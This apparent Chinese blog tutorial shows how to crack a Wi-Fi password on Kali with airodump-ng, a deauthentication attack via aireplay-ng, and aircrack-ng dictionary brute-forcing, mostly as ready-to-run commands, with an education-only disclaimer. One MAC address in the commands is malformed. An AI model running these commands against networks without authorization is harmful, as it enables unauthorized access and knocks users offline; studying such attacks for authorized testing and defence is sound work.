在kali系统中通过airodump-ng命令对周边网络进行扫描,并抓取特定网络的握手包,利用aireplay-ng命令进行ack攻击使wifi断连重连顺利捕获到握手包,最后通过aircrack-ng命令对抓取到的cap握手包进行暴力破解
该教程仅适用于交流学习!

硬件准备

  1. 安装kali系统并插入无线网卡(免驱)
    官网找到相应的iso镜像,在VM虚拟机中安装
  2. 在宿主机禁用该网卡,kali虚拟机连接
    使用命令ifconfigiwconfig可用来检测网卡的状态

网络渗透

  1. 开启网卡monitor模式

    airmon-ng start wlan0 #激活无线网卡监听功能

  2. 扫描周边网络,注意目标网络的ch和bssid
    ch指该网络的channel, bssid类似于该网络的mac地址

    airodump-ng wlan0 #扫描周边环境的wifi信号

  3. 对目标网络进行抓包

    airodump-ng -c 6 --bssid 90:B6:7A77:8E:D6 -w /home/kali/Desktop/handshake wlan0 #抓包命令

  4. Ack攻击使设备下线重连,加速抓包

    aireplay-ng -0 10 -a 90:B6:7A77:8E:D6 -c 18:26:49:53:93:78 wlan0 #ack死亡攻击

  5. 对抓取到的cap文件进行暴力破解

    #两条命令均可
aircrack-ng -w /home/kali/Desktop/passwd.txt -b 90:B6:7A77:8E:D6 /home/kali/Desktop/handshake-0*.cap
aircrack-ng -w /home/kali/Desktop/passwd.txt /home/kali/Desktop/handshake-0*.cap

补充命令

  1. 关闭monitor模式

    ifconfig wlan0 down
iwconfig wlan0 mode monitor/managed
ifconfig wlan0 up

  2. 如果检测不到wifi,可先杀死一些进程,之后开启monitor模式

    airmon-ng check kill
kill [pid]
pkill [mingcheng]

Tips

  1. 网卡要在宿主机上禁用,直接连接到kali虚拟机
  2. 网络强度很重要,信号差的网络大概率抓不到包
  3. 抓包之前要关闭扫描网络的命令,扫描的过程中网卡的channel一直在变化

参考文献

  1. 零度解说Youtube Channel : https://www.youtube.com/watch?v=tKjVfGEoBZY&t=1s
  2. Kali官网:https://www.kali.org

免责声明:本博客提供的内容和工具仅供教育和研究目的使用。它旨在提高公众对网络安全威胁的意识,并帮助人们保护自己免受这些威胁。使用这些信息进行任何非法活动或未经授权的访问是严格禁止的,并可能受到法律的严厉惩罚。作者或发布者不对由于滥用这些信息而导致的任何行为或后果承担责任。在实施任何网络测试之前,您必须获得所有必要的授权。尊重他人的隐私权和法律是每个网络专业人员和爱好者的基本责任。

标签: kali, wifi, 暴力破解

添加新评论